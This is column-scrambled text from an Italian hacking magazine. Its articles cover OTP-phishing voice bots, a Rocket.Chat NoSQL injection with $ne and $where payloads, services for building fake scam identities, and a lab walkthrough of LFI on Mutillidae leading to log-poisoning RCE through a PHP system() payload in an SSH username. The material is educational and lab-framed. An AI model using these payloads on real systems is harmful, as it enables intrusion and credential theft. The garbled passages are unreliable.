se la telefonata di PayPal
arrivasse da qualcuno con
un pesante accento straniero
o addirittura che parlasse russo,
sarebbe molto poco credibile.
Invece, il bot è “sicuro”.
E supera qualsiasi timidezza
del cyberattaccante perché per
fare una truffa telefonica ci vuole
sangue freddo e una certa
abilità. Il bot non è solo un
sintetizzatore vocale, ma anche
un sistema che innanzitutto si
I bot che effettuano chiamate vocali
non sono solo scocciature, ma
possono anche nascondere pericoli
 18
connette con una serie di
software di offuscamento a dei
fornitori di servizi come Twilio
(che però sta bloccando questo
tipo di connessioni). E poi da un
lato interagisce per esempio
con PayPal e dell’altro recupera
il one-time code e lo sa utilizzare
per fare rapidamente la
transazione, sempre con un po’
di offuscamento per non essere
tracciabile. Niente di esoterico, e
si possono fare tunnel e onion
routing per rendere il tutto
ancora più difficile da seguire.
Il bot alla fine è una piccola suite
software che nel Dark Web costa
circa 500 euro. Ma il suo mercato
sta esplodendo. Anche perché
i sistemi di sicurezza sono
impreparati per proteggersi
da questo tipo di attacco.
È UN MONDO DIFFICILE
Costruire un sistema che sia
sicuro, utilizzando OTP (one time
password) o 2FA (autenticazioni
In qualche modo le app telefoniche
ci avvertono, a volte, dell’arrivo
di telefonate truffaldine…
ma non sempre!
a due fattori) è diventato sempre
più complicato. Anche perché
il costo di uno di questi attacchi
è bassissimo, rispetto a quello
necessario a mettere in piedi
la difesa adatta.
Un costo talmente
sproporzionato che anche
piccole banche locali sono a forte
rischio. Un tempo, infatti, sistemi
come gli audio bot richiedevano
molto tempo per essere
sviluppati e avevano senso solo
se il numero di attacchi era
talmente ampio da ripagare
il costo di sviluppo. Adesso
le customizzazioni sono molto
semplici e vengono fatte
rapidamente, con linguaggi
di scripting facili.
Così, il bot viene “personalizzato”
anche per attaccare banche
locali, che oltretutto hanno
difese più limitate. Gli scammer
riescono a effettuare transazioni
al volo per piccole cifre
su account che vengono
immediatamente svuotati
al primo bancomat usando
carte prepagate anonime
o acquistate online con
documenti falsi.
I cattivi sono Otp Agency,
BloodOPT, 10toGo e tutti
gli altri bot che sono diventati
lo spauracchio degli esperti
di cybersecurity. Sfruttano
debolezze nel sistema di
autenticazione e soprattutto nel
modo con i quali gli utenti usano
questi servizi. Loro si fidano
e così si lasciano fregare.
hackerjournal.it

Il punto di riferimento per chi fa dell’hacking

una filosofia di vita
La crew di Hacker Journal ti aspetta ogni giorno sul suo nuovo sito Web, il ritrovo della sua ricca comunità
hacker. Troverai anticipazioni degli articoli, news dal mondo della (in)sicurezza, contest, offerte speciali e
un forum che vuole essere il punto di riferimento per chiunque voglia diventare un esperto di sicurezza.
In un periodo storico in cui governi e multinazionali si divertono a spiare tutto e tutti, sulle
pagine della rivista e sul suo sito scoprirai come difenderti e contrattaccare. #HJisBACK

Scopri il sito e la comunità di Hacker Journal

Forum: iscriviti subito e inizia a dialogare con la redazione e la comunità di HJ
• News: le ultime notizie su cyberintrusioni, furti
di credenziali, bug, malware e altro ancora
• Contest: metti alla prova le tue conoscenze
con i giochi e le sfide della redazione
• Collezione HJ: i vecchi numeri della rivista,
in PDF, da scaricare
• Invia un articolo: ti piace scrivere e hai un’idea
originale per un articolo? Inviacela e la valuteremo!
 HACKTUALITÀ

BUC A R E L A C H AT
SENZA SQL
GLOSSARIO
DI BASE

SQL
Simple Query Language, è un
st em a di m es sa g g is tica Rocket.Chat
linguaggio per database basato Il si
sulle query, cioè delle
cu ne no SQ L inje ct io n che permettono
ha al
di bypassare il login
interrogazioni che usano una
sintassi ben definita. Ogni
a un malintenzionato
operazione, dall’inserimento di
amministrazione
dati alla ricerca, viene eseguita ottenendo i privilegi di
passando al motore del database

una richiesta che è
sostanzialmente una stringa
di testo. L’alternativa ai database
che usano l’SQL sono i database
noSQL, nei quali si utilizzano
delle librerie per accedere agli
elementi della base dati come se
fossero degli oggetti (ciascuno
con le sue funzioni e proprietà).
SQL INJECTION
Applicazione basata su SQL che
ha il compito di comunicare con
il database costruendo delle
query e inviandole. Per costruire
le query viene spesso utilizzato
un input dell’utente: questo
significa che se il testo fornito
dall’utente non viene pulito
adeguatamente, si potrebbero
inserire comandi SQL e cambiare
il funzionamento della query.
JSON
È un formato testuale che
memorizza dizionari e array:
coppie di dati (chiave e valore),
e liste di dati. È ormai uno
standard per scrivere tipologie
di dati che vanno in coppia, per
esempio “nome”: “Garfield”
e “animale”: “gatto” oppure
“cibo preferito”: “lasagna,
polpette, croccantini”.
L
avorando con un database
SQL occorre validare tutti
i dati forniti dall’utente per
evitare che qualcuno possa
passare una stringa che, se inserita
nella query prevista dall’app, la
spezzi ed esegua altre istruzioni
SQL. Si potrebbe pensare che i
database noSQL non abbiano di
questi problemi. Gli sviluppatori di
MongoDB, uno dei più famosi
database noSQL, avevano scritto:
“Con MongoDB non costruiamo
query da stringhe, quindi i
tradizionali attacchi SQL injection
non sono un problema”. Che non è
né del tutto vero, né del tutto falso.
VELOCE COME UN RAZZO
Tra le applicazioni più famose
basate su MongoDB c’è Rocket.
Chat, un sistema di messaggistica
Ricordiamo che attaccare server
altrui è un reato, per cui facciamo
esperimenti solo sulle macchine
che abbiamo tirato su noi
istantanea utilizzato da molte
community online e all’interno
di aziende. Alcuni gruppi di
sviluppatori di software Open
Source la utilizzano come
strumento di supporto per gli
utenti, consentendo anche
l’accesso a chi non è autenticato.
Naturalmente c’è una distinzione
tra gli utenti semplici e gli
amministratori, fondamentale per
garantire la privacy e la sicurezza di
tutti. Ma con una noSQL injection
è possibile ottenere, a causa di un
bug nell’applicazione, l’accesso
a un account di amministrazione,
con un controllo completo sulla
messaggistica privata di tutti.
Il principio di funzionamento delle
noSQL injection è sostanzialmente
lo stesso delle SQL injection,
cambia solo la forma. In MongoDB

 20
 VULNERABILITÀ
{“$ne”:1}

Se l’applicazione non pulisce l’input

dell’utente, il malintenzionato
inserirà questa stringa nel
dizionario che potrà essere
interpretata come oggetto. E
quindi la condizione per la verifica
della password diventerebbe:

figura #1 {

L’exploit permette l’estrazione di informazioni critiche come hash della username: “admin”,
password e token per il reset delle credenziali. password: {
“$ne”:1
memorizziamo documenti JSON, accetta sia una stringa che un }
non tabelle. Un tipico documento oggetto (l’operatore $gt è a sua }
è qualcosa del genere: volta racchiuso in un dizionario).
In una situazione come questa è Siccome la password sarà sempre
{ possibile per l’utente eseguire una diversa da “1”, la condizione
_id: noSQL injection se l’app prende il risulterebbe vera e il login verrebbe
“507f1f77bcf86cd799439011”, suo input e lo inserisce nel JSON quindi autorizzato. Anche se
name: “admin”, senza controllarlo adeguatamente. Rocket.Chat verifica questo tipo di
age: 42, Per esempio, una query per input, una volta loggati è possibile
secrets: { verificare la corrispondenza della sfruttare una noSQL injection per
token: “s3cr3t” password di un utente è: ottenere un accesso da root.
},
role: “unprivileged” { RAMPA DI LANCIO
} username: “admin”, L’API di Rocket.Chat users.list
password: “s3cret” prende i parametri per la ricerca
In questo caso, una semplice query } degli utenti dall’URL della sua
per trovare gli utenti che hanno il chiamata. Questi parametri
ruolo di amministrazione e più di Ma il malintenzionato potrebbe vengono utilizzati per costruire la
40 anni avrebbe questa forma: scrivere al posto della password: query sulla collection degli utenti.

{
age: {
$gt: 40
},
role: “unprivileged”
}

L’operatore $gt indica il “maggiore”

(greater than). La query è vista
come un dizionario nel quale le
chiavi indicano il campo in cui
cercare e il valore è la condizione
figura #2
posta. Il problema è che come È stato pubblicato un exploit in Python che prova automaticamente a
valore da cercare, MongoDB recuperare le credenziali di accesso di un amministratore da Rocket.Chat.

21 
 HACKTUALITÀ
Ogni volta che si passano dati
a un database, essi devono essere
sanificati, altrimenti si rischia grosso
Siccome nella collection vi sono
dei campi che non devono essere
accessibili a tutti, è stato
implementato un controllo basato
su una blacklist: vengono rifiutate
tutte le richieste di campi che non
dovrebbero essere pubblici.
Questo è un estratto del codice:
API.v1.addRoute(‘users.list’,
{ authRequired: true }, {
get() {
// …
const { sort,
fields, query } = this.
parseJsonQuery();
const users = Users.
find(query, { /* … */}).
fetch();
return API.v1.
success({
users,
// …
});
},
});
Il problema sta proprio in questo
controllo: autorizzare una query
in base a una blacklist è in realtà
abbastanza permissivo e poco
sicuro, perché significa che tutti i
campi non specificati nella blacklist
possono essere oggetto della
query. Quindi basta dimenticarsi
di includere qualche campo nella
blacklist e diventa possibile lanciare
query pericolose. Sarebbe più
sicuro un meccanismo a whitelist,
con una limitata selezione di campi
accessibili. È quello che è successo:
la blacklist tiene in considerazione
soltanto i campi presenti nella
 22
ENTITÀ DELLA VULNERABILITÀ
Se è possibile ottenere l’hash della
password di un amministratore
è chiaro che un’installazione
di Rocket.Chat non può essere
collection, ma non considera i vari considerata sicura. Le eventuali
operatori messi a disposizione a un conversazioni private rischiano
livello più alto da MongoDB stesso. di essere trafugate. Ma non solo:
È quindi possibile inserire nella Rocket.Chat ha una serie
query l’operatore $where, che di estensioni che creano dei
prende una espressione regolare webhook, per il collegamento ad
e la esegue con l’interprete altri servizi, che possono essere
JavaScript. Questa cosa diventa abilitate da un amministratore.
interessante perché c’è un Il problema è che è possibile anche
dettaglio sulla gestione degli errori definire uno script da avviare
che torna comodo ai quando il webhook viene attivato
malintenzionati. La query: da una chiamata. Gli script
vengono eseguiti dalla VM di
{ “$where”:”this. NodeJS, ma sappiamo bene che
username===’admin’ && (()=>{ questo non è un vero meccanismo
throw this.secret })()”} di sicurezza. È quindi chiaro
che un malintenzionato diventato
fornirebbe la risposta: amministratore potrebbe
preparare uno script che, tramite la
{ “success”: false, funzione exec, esegue dei comandi
“error”: “uncaught sulla macchina di Rocket.Chat.
exception: aHR0cHM6Ly9iaXQubHk A questa vulnerabilità si aggiunge
vM3VQclgwUA==”} un’altra noSQL injection che
permette, con un certo numero
che contiene proprio l’hash della di tentativi, di ottenere il token
password dell’utente admin. per il reset della password di un
Un malintenzionato può risalire qualsiasi utente. Unendo i due bug
alla password tramite un attacco è possibile per un malintenzionato
a dizionario o bruteforce, e anche privo di qualsiasi accesso alla chat
ottenere altre informazioni come ottenere dapprima il login come
l’email e il secret per l’eventuale utente semplice, e poi le credenziali
autenticazione a due fattori. di un amministratore.
LA SOLUZIONE
I n seguito alla responsible disclosure delle vulnerabilità da parte
del team che le ha scoperte (SonarSource), gli sviluppatori hanno
rilasciato dei bugfix in meno di un mese. La versione vulnerabile
è la 3.12.1: è consigliabile aggiornare la propria installazione
di Rocket.Chat alla 3.12.4 o anche alla 3.13.2. I fix consistono
“semplicemente” in un controllo molto più rigido dell’input
dell’utente, per assicurarsi che sia una stringa e non un oggetto.
SICUREZZA
profili fake Pirati e false identita
Alcune risorse per creare identità fittizie da usare in Rete............................................... 24

pentesting Attacco ai log! Terza parte

Dopo XSS e DoS, ecco a voi un attacco RCE in salsa log!................................................. 28
 SICUREZZA

Pirati e false identità

Abbiamo scovato alcune delle risorse che i criminali
informatici possono usare per creare falsi profili
e cercare di raggirarci per carpirci soldi o dati sensibili

 24

L
e truffe online sono,
purtroppo, all’ordine
del giorno. Per esempio,
la classica email nella
quale un fantomatico avvocato
o un parente di un defunto
ci offrono una donazione e ci
chiedono quindi tutti i nostri
dati personali e il numero di
telefono. Oppure quando una
graziosa signorina ci contatta
su Facebook dicendo che siamo
il suo partner perfetto.
Ovviamente l’identità di chi
scrive è falsa. Ma i criminali
nascosti dietro queste truffe
come fanno a creare delle
identità credibili? Fanno chissà
quali ricerche offline e online
o usano mezzi particolarmente
sofisticati? Comprano i dati
di altre persone nel Dark Web?
Beh, se qualcuno ci vuole tirare
un brutto scherzo, la risposta
è molto più semplice.
SEMPLICI SERVIZI ONLINE
Se il pirata di turno vuole crearsi
una falsa identità trova in Rete
diverse “armi” a sua
disposizione. Partiamo dai dati
anagrafici. Il criminale, invece
PROFILI FAKE
di sforzarsi nel creare un nome ARMA
e un indirizzo credibili, non fa
A DOPPIO TAGLIO
altro che andare su un sito
Creare profili falsi è un’arma
come Fake Name Generator
a disposizione anche degli
(https://fakenamegenerator. hacker buoni e delle Forze
com). Approdato al sito, non dell’Ordine. Insomma, si
deve fare altro che selezionare possono usare per ingannare
il sesso (Gender), la nazionalità chi ci vuole ingannare.
È quanto ha fatto un nostro
del nome (Name set) e la
collaboratore nel numero 254
nazionalità “di residenza” di Hacker Journal, riuscendo a
(Country). Preme il pulsante carpire alcune informazioni sul
Generate e il sito crea quasi criminale che stava cercando di
all’istante un profilo fake (finto) truffarlo per poi passare il tutto
di tutto rispetto, con indirizzo alla Polizia Postale, l’ente
preposto a questo tipo di
di residenza, data di nascita,
indagini. Nell’articolo potete
nome della madre, casella leggere le procedure che ha
di posta temporanea su usato per incastrare il furfante.
fakemailgenerator.com, un Come dice il detto, chi la fa
numero di telefono che i servizi l’aspetti!
online dovrebbero ritenere
valido, caratteristiche fisiche,
una falsa carta di credito,
colore preferito e altro ancora.
In questo modo si possono
creare profili di molte nazioni
del mondo, dall’Australia
all’Uruguay. Non esiste un’app
mobile per questo sito,
ma se il pirata vuole trasferire
i dati nella rubrica del suo
smartphone, così da averli
sempre con sé, può usare
Un clic e si cambia
identità. Grazie a Fake
Name Generator un
pirata impiega solo
qualche istante per
creare un’identità fittizia
da usare per frodarci,
facciamo attenzione.
25 
 SICUREZZA
il Qr Code che appare andando in
fondo alla pagina del falso profilo
e premendo il link che si trova
accanto alla scritta Qr Code.
L’ESTENSIONE “FALSARIA”
Un contro di Fake Name
Generator è che per usare
online i dati generati il pirata
li deve copiare e incollare
(o digitarli) ogni volta che li usa.
Per questo motivo, può
installare un’estensione
per browser come Fake Data
(https://www.fakedata.pro).
È disponibile per Firefox,
Chrome, Edge e Opera ed esiste
in due versioni: gratuita (più
che adatta nella maggior parte
dei casi) o a pagamento (Pro
e Ultra). Una volta installata,
il pirata posiziona il cursore in
uno dei campi di inserimento
dati del form online che deve
compilare, per esempio quello
Creare profili finti e false identità
in Rete per ingannare qualcuno
è un reato, facciamo attenzione
 26
che si usa per registrarsi su un
social network, fa clic destro con
il mouse e sceglie l’opportuno
dato falso dalla voce Fake Data
del menu a comparsa. Per
esempio, per inserire il nome
durante la registrazione su
Facebook, si sceglie la voce Fake
Data > first_name. Appena
installata, l’app genera identità
USA: per cambiare nazionalità
il pirata clicca sull’icona
dell’estensione, poi sull’icona
con l’ingranaggio per entrare
nelle opzioni e alla voce
Generator language sceglie
la nazionalità che gli interessa.
Nella stessa pagina ci sono altre
opzioni su cui agire. Per avere
a disposizione una email
temporanea e un numero
di telefono utilizzabile per
l’autenticazione degli account,
il pirata deve acquistare una
delle due versioni a pagamento.
Per i più pigri.
Se il pirata non ha
neanche voglia di copiare
e incollare i dati
falsi dell’identità fake
che ha creato, può usare
l’estensione Fake Data
che compila i form online
in automatico.
CHE ASPETTO HA?
Il criminale che vuole usare
un profilo finto sui social, per
esempio, ha bisogno anche di
una foto della persona “creata”.
Non si può certo fotografare
lui stesso, quindi ricorre a siti
Web come https://
thispersondoesnotexists.com o
https://generated.photos/faces.
Il primo sito crea una diversa
foto di una persona inesistente
ogni volta che si ricarica la
pagina Web. Quando il pirata
trova un volto adatto all’utente
che vuole impersonare, non
fa altro che fare clic destro
sulla foto e salvarla sul disco.
Il secondo servizio è un po’ più
evoluto e mette a disposizione
diverse opzioni per la
generazione di foto.
Per esempio si può decidere
il colore dei capelli o degli occhi,
se la foto deve essere ripresa
frontalmente o con la “persona”
leggermente girata a destra
o a sinistra. O, ancora, se deve
essere giovane o anziana.
Le immagini sono create,
in base ai parametri scelti,
da un’Intelligenza Artificiale.
Per usare il servizio il pirata
deve registrarsi (e userà
sicuramente un profilo fake...).
Con la versione gratuita

è possibile scaricare immagini
JPG dalla risoluzione ridotta
(512x512 pixel) e con una
filigrana (che un pirata riesce
a rimuovere senza troppi
problemi...).
EMAIL, SIM E ALTRO
I pirati completano la loro
opera creando delle email
temporanee, non possono
certamente usare la propria
per frodare qualcuno.
Per esempio usano un sito come
Guerrilla Mail (www.
guerrillamail.com/it) o Temp
Mail (https://temp-mail.org/it).
Quest’ultimo sito offre anche
un’estensione per i browser
più diffusi e un’app mobile
per Android e iOS.
Per quel che riguarda il numero
di telefono, il criminale può
ricorrere a siti come https://
temporary-phone-number.com
scegliendo una delle nazioni
disponibili (non c’è l’Italia)
oppure altri servizi simili.
O ancora, acquista delle
SIM anonime nei Paesi limitrofi
al nostro, nei quali sono
PROFILI FAKE
perfettamente legali. Con Anonabox
Infine, per nascondere il proprio navighiamo nella
indirizzo IP e quindi evitare di rete TOR ed entriamo
essere geolocalizzato mentre nel Dark Web senza
è online, il truffatore usa servizi installare nulla nel
di VPN, dei proxy, la rete TOR nostro PC, neanche
o uno scatolotto come il TOR browser.
Anonabox (https://www.
anonabox.com) e magari anche
delle estensioni per impedire
al browser Web di mostrare
le caratteristiche del browser
stesso e del PC usato, evitando
cioè il cosiddetto “browser
fingerprinting”.
Praticamente reali.
L’Intelligenza Artificiale
di https://generated.
photos/faces
genera fotografie di
persone inesistenti
difficilmente distinguibili
da quelle reali.
27 
 SICUREZZA
Attacc o a i l o g !
a voi un attacc
Dopo XSS e DoS, ecco
I
niziamo la nuova puntata
di questa serie con un breve
riepilogo di quanto visto sinora.
Siamo impegnati nella verifica
di sicurezza di una rete di
addestramento ribattezzata
“palestra per pentester”, che
abbiamo realizzato mediante
ricorso alla virtualizzazione (come
descritto nel PDF che trovate
all’URL https://bit.ly/palestra_hj).
La palestra ci consente di
migliorare le nostre abilità di
penetration tester in erba senza
correre alcun rischio di natura
La pagina Show-Log, contenente
i log salvati da Mutillidae.
 28
legale. In questa fase della verifica
di sicurezza ci siamo focalizzati
sullo strato applicativo, e più
precisamente sul server Web, che
ospita la Web application
Mutillidae (vedi omonimo box).
I LOG DEL SISTEMA
Nelle ultime puntate ci siamo
soffermati in particolare sulle
vulnerabilità che affliggono il
sistema di log di Mutillidae [figura
#1], che siamo riusciti a colpire con
attacchi di tipo Cross Site Scripting
e Denial of Service. In questo modo
figura #1
TERZA PARTE
o RCE in salsa log!
abbiamo ottenuto lo scopo
di mostrare quanto possa essere
pericoloso, per la sicurezza
complessiva di un sistema,
disporre di un meccanismo di log
progettato in maniera grossolana
o non sufficientemente protetto.
Eppure quello implementato da
Mutillidae non è l’unico sistema
di log a essere in pericolo:
mettendo a sistema le informazioni
sin qui raccolte e sfruttando in
maniera opportuna le vulnerabilità
della Web app, possiamo
estendere il campo dei nostri
attacchi ai log prodotti dal sistema
operativo del server Web.
LOCAL FILE INCLUSION
Come? Semplice: sfruttando
l’attacco di tipo Local File
Inclusion (per gli amici LFI) che
abbiamo scoperto qualche puntata
fa. Ricordate? Stiamo parlando
di un attacco teso a esfiltrare i file
contenuti nel filesystem locale del
server (che, è bene sottolineare,
di norma non dovrebbero essere
accessibili all’utente www-data)
 PENETRATION TEST
figura #2 La pagina Show-Log
attaccata tramite LFI
restituisce il contenuto
del file /etc/passwd.

• il nome e il path del file siano

sfruttando un’apposita
vulnerabilità della Web app,
generalmente legata a un
insufficiente controllo di un input
utente. Abbiamo già visto all’opera
questo attacco contro Mutillidae:
per esempio, l’URL http://www.
labpentest.hj/mutillidae/index.
php? page=../../../etc/passwd
ci consente di visualizzare a video
i contenuti del file /etc/passwd
[figura #2], con tanto di lista degli
utenti locali definiti sul server Web.
LFI & LOG
Si tratta solo di uno degli
innumerevoli modi per sfruttare
questa tecnica: in presenza
di un’applicazione completamente
vulnerabile (e Mutillidae rientra
proprio in questa categoria),
i limiti di utilizzo di un attacco LFI
dipendono solo dalla nostra
fantasia e creatività. Abbiamo
infatti accesso praticamente
a qualsiasi file presente sull’hard
disk del server, a patto che:
a noi noti;
• il file risulti accessibile in lettura
all’utente che esegue il server Web
(ovvero, come abbiamo appurato
nelle precedenti puntate, all’utente
www-data).
Sono condizioni soddisfatte dalla
stragrande maggioranza dei file
di sistema, come i file relativi alla
configurazione DNS o, tanto per
restare in tema, i file di log.
LOG DI SISTEMA
In una macchina Linux come quella
che stiamo attaccando, il principale
contenitore di questo tipo di file è
rappresentato dalla directory /var/
log: è qui che vengono convogliati

d i t e s t c o m p l e t o
Un ambiente Rete
Internet 211.100.1.2 Target

Backbone
211.100.1.1 Server
212.100.1.3 FTP
Router
212.100.1.1

210.100.1.2
212.100.1.2
Pentester Server
210.100.1.1 Web

All’URL https://bit.ly/palestra_hj
trovate le istruzioni per creare
la palestra virtuale. 29 
 SICUREZZA
figura #3
Il contenuto del file /var/syslog del server Web.
non solo i log di sistema, ma anche
quelli prodotti dai principali servizi
e da alcune delle applicazioni
installate [figura #3]. Si tratta di file
che rispettano (nella stragrande
maggioranza dei casi) i requisiti
per un attacco LFI, in quanto dotati
di nomi prestabiliti e accessibili
(in lettura) a tutti gli utenti:
niente dunque ci impedisce di
impossessarci dei relativi contenuti
sfruttando la falla individuata
in Mutillidae. Per esempio, risulta
banale visualizzare a video
i contenuti del file contenente i log
di sistema, ovvero /var/log/syslog
[figura #4]: http://www.labpentest.
hj/mutillidae/index.php?page=
../../../var/log/syslog
INTERPRETE PHP
Per quanto potenzialmente fonte
di informazioni d’interesse sul
sistema e sui relativi servizi,
Un esempio di contenuto
del file /var/log/
apache2/access.log.
 30
Un esempio del
contenuto tipico
della directory
/var/log.
figura #4
la semplice esfiltrazione dei log
non costituisce, tuttavia, un’attività
particolarmente rilevante per
il nostro penetration test.
Ben altro discorso se invece
potessimo sfruttarli per eseguire
un’operazione sul sistema (magari
un comando di shell) rendendo
bidirezionale quello che, sinora,
avevamo considerato un canale
accessibile esclusivamente in
lettura. Si tratta di un discorso
tutt’altro che campato in aria, visto
che sul server Web disponiamo
di un interprete PHP in esecuzione:
se uno dei file a cui accediamo
sfruttando la vulnerabilità dovesse
contenere del codice PHP, questo
sarebbe eseguito dal relativo
interprete come se si trattasse di
una qualsiasi pagina dinamica.
In altri termini, la vulnerabilità
di tipo LFI può diventare il canale
attraverso cui compiere un vero
e proprio attacco RCE (Remote
Command Execution)!
SCRIVERE NEI LOG
Perché ciò sia possibile, tuttavia,
avremmo bisogno di incidere sui
contenuti dei log, pur operando da
semplici utenti ordinari dei servizi
erogati dal server Web. Esiste
un modo per riuscirci? La risposta
è sì, a patto di mettere a sistema
quanto appreso durante il
pentesting con le nozioni base del
log in ambiente GNU/Linux. Tutto
quello che dobbiamo fare è trovare
un servizio – tra i tanti offerti, come
abbiamo avuto modo di appurare,
dalla macchina “Server Web” – che:
• disponga di un meccanismo
di log attivo;
• inserisca all’interno del log
informazioni dipendenti dalle
richieste utente.
In queste condizioni, controllando
tali informazioni possiamo
determinare l’inserimento di codice
PHP arbitrario all’interno dei log.
Codice che sarà poi eseguito grazie
all’attacco LFI appena visto…
AUTH.LOG
Non abbiamo bisogno di
approfondite conoscenze del
sistema GNU/Linux per individuare
due potenziali candidati, ovvero
il servizio Web (Apache, nel nostro
figura #5

Un esempio di contenuto del file /var/log/auth.log.
specifico caso) e il demone SSH
(sshd). Le nostre precedenti
indagini, infatti, ci hanno
dimostrato come i due servizi siano
in esecuzione sulla macchina
Server Web (rispettivamente
alla porta 80 e 22); inoltre entrambi
dispongono di un sistema di log
rientrante nei requisiti
che abbiamo tracciato.
Più precisamente:
• Apache conserva, nel file /var/
log/apache2/access.log [figura
#5] i dati relativi alle richieste HTTP
provenienti dai client e alle relative
risposte (tra cui possiamo citare
parametri come il metodo
utilizzato, la risorsa richiesta o il
browser in opera, che si prestano
perfettamente ai nostri scopi);
• sshd inserisce all’interno del file
/var/log/auth.log [figura #6] i dati
relativi ai tentativi di connessione
in SSH alla macchina, salvando –
tra l’altro – informazioni come
il nome dell’utente che ha provato
a effettuare il login da remoto.
LFI SU AUTH.LOG
A prima vista, dunque, non ci resta
che l’imbarazzo della scelta…
ma poiché nella puntata
precedente, per attaccare
il sistema di log interno di
Mutillidae, abbiamo già “giocato”
sui parametri associati alla
richiesta HTTP, questa volta
PENETRATION TEST
figura #6
ci focalizzeremo su SSH. Prima
di iniziare l’attacco vero e proprio,
completiamo l’ultima verifica
preliminare: è possibile visualizzare
il file dei log (/var/log/auth.log,
come detto) tramite le pagine
vulnerabili di Mutillidae? Per
provarlo, è sufficiente richiedere
la visualizzazione dell’URL
http://www.labpentest.hj/
mutillidae/index.php?page=../../../
var/log/auth.log che ci mostra
l’intero contenuto del file
d’interesse [figura #7].
VERIFICHE PRELIMINARI
Superato questo primo test,
è tempo di alzare l’asticella:
sappiamo che sshd salva in
auth.log l’username dell’utente
che prova a effettuare il login
tramite SSH, ma cosa accade
Il contenuto del file /var/log/auth.log del server Web.
Mutillidae
Mutillidae è una Web
application didattica,
Open Source e liberamente
installabile da chiunque
intenda migliorare le proprie
capacità di pentester. Rispetto
ad altre Web app simili
(come “Damn Vulnerable Web
Application” - DVWA, che
abbiamo visto nelle puntate
precedenti) si contraddistingue
per il suo approccio basato
sulle vulnerabilità appartenenti
alla lista denominata OSWAP
Top 10 (www.owasp.org), che
racchiude le 10 falle più diffuse
in ambito Web. Sotto questo
profilo Mutillidae ci offre
un ambiente addestrativo
privilegiato, consentendo
di confrontarci con le diverse
incarnazioni di ciascuna
delle vulnerabilità incluse
nella OSWAP Top 10.
se l’utente in questione non esiste?
Per scoprirlo, effettuiamo una
connessione SSH alla VM “Server
Web”. Dalla nostra VM Kali,
avviamo un terminale e inseriamo
il comando
# ssh ‘prova inserimento in
log’@www.labpentest.hj
In questo modo chiediamo di
creare una connessione SSH alla
figura #7
31 
 SICUREZZA
Questo tentativo di login
figura #8 non va certo a buon fine
visto che l’esistenza
dell’utente indicato
è inverosimile.

GET e POST
I due metodi HTTP principali
utilizzati per richiedere una
risorsa (come la pagina di un
sito) a un server Web sono GET
e POST, e si differenziano
per le modalità con cui il
browser (ovvero il client)
trasmette gli eventuali parametri
della richiesta al server:
• nelle richieste POST,
i parametri sono inseriti nel
corpo della richiesta HTTP, e di
conseguenza non sono visibili
all’utente né (immediatamente)
modificabili da quest’ultimo;
• nelle richieste GET, i parametri
vengono accodati all’URL
e possono quindi essere notati
immediatamente dall’utente,
che può procedere alla modifica
semplicemente interagendo
con la barra degli indirizzi
del browser.
macchina www.labpentest.hj
(ovvero al server Web che stiamo
attaccando) per conto dell’utente
‘prova inserimento in log’. Si tratta
di un tentativo chiaramente
ALL’ATTACCO!
Una volta appurata la possibilità
di inserire una stringa arbitraria
nel log, possiamo passare allo
step successivo del nostro attacco,
provando a iniettare del codice
PHP in auth.log per verificarne
la corretta esecuzione. Poiché
siamo interessati a eseguire
un attacco RCE, optiamo per
l’iniezione nel log di un’istruzione
PHP in grado di eseguire un
comando di shell, nel caso
specifico whoami: in questo caso,
il codice da inserire in auth.log è
<? system(“whoami”);?>
A tal fine, avviamo nuovamente
il client SSH con il comando
[figura #10]
# ssh ‘<?
system(“whoami”);?>’@www.
labpentest.hj
per poi visualizzare per l’ennesima
volta la pagina http://www.
labpentest.hj/mutillidae/index.
php? page=../../../var/log/auth.log.
Tutto fila secondo le previsioni: nel
log possiamo vedere chiaramente
il messaggio d’errore [figura #11]
Invalid user www-data
relativo al nostro tentativo fallito
di connessione SSH con l’utente
<? system(“whoami”);?>.
SALTO DI QUALITÀ
Utilizzando la tecnica che abbiamo
appena visto possiamo continuare
a eseguire i comandi di shell che
desideriamo: ma si tratta di una
procedura piuttosto lenta
e macchinosa. Ben altra cosa
sarebbe disporre di una pagina
in grado di eseguire i comandi
inviati direttamente da browser:
in questo modo potremmo
effettuare un salto di qualità
nel nostro attacco e “interrogare”
la shell del server Web

figura #9
infruttuoso [figura #8], sia perché
è del tutto inverosimile l’esistenza
di un utente del genere, sia perché
la stragrande maggioranza (se non
la totalità) delle distro vieta l’utilizzo
di spazi nei nomi utente: ciò
nonostante, il comando svolge in
maniera corretta il compito che gli
abbiamo assegnato, ovvero quello
di inserire la stringa ‘prova
inserimento in log’ all’interno del
file di log, come testimonia la
pagina http://www.labpentest.hj/
mutillidae/index.php?page=../../../ Perfetto! Siamo riusciti a iniettare una stringa
var/log/auth.log [figura #9]. arbitraria nel file /var/log/auth.log!

 32

praticamente in tempo reale.
Perché ciò sia possibile, dobbiamo
inserire all’interno di auth.log
del codice PHP in grado non solo
– come fatto finora – di eseguire
un comando di shell, ma anche di
scegliere tale comando sulla base
delle indicazioni dell’utente.
Nelle condizioni in cui ci troviamo,
privi di un vero e proprio accesso
in scrittura al server Web,
implementare un’apposita casella
di testo per ricevere un input
dall’utente sarebbe un’operazione
proibitiva, se non virtualmente
impossibile. Per fortuna, non
siamo interessati più di tanto
all’interfaccia da utilizzare per
il nostro attacco, quanto piuttosto
alla sua concretezza: possiamo
quindi optare per soluzioni diverse
(ma non meno efficaci), come
passare il comando di shell tramite
l’URL richiesta dal browser.
RICHIESTE GET & PHP
Tradotto in termini tecnici, significa
gestire – attraverso il codice PHP
iniettato in auth.log – una richiesta
HTTP di tipo GET (vedi il box GET
e POST) che, oltre a comportare
la visualizzazione (sfruttando
l’attacco LFI) del file di log,
provveda a passare al nostro
codice – attraverso un parametro
che chiameremo, poco
fantasiosamente, comando
– il comando di shell che vogliamo
eseguire. In questo modo, anziché
dover iniettare, per esempio,
il comando ls all’interno di auth.log,
collegandoci in SSH all’utente <?
system(“ls”);?>@www.
PENETRATION TEST
figura #10 Con questo tentativo di
login in SSH proviamo a
inserire codice PHP in
auth.log.
figura #11
Questa volta nel file /var/log/auth.log è stato
inserito codice PHP, correttamente eseguito
dall’interprete PHP presente sul server Web.
labpentest.hj, sarà sufficiente l’array associativo $_GET[]: è
richiedere al browser la pagina sufficiente specificare come indice
con URL http://www.labpentest.hj/ il nome del parametro d’interesse
mutillidae/index.php?page=../../../ per ottenerne l’effettivo valore
var/log/auth.log&comando=ls. attribuito dall’utente. Per esempio,
Insomma, un bel salto di qualità a fronte della richiesta da parte
nel nostro attacco, che ci dell’utente dell’URL che abbiamo
consentirà di eseguire un numero appena citato, il parametro
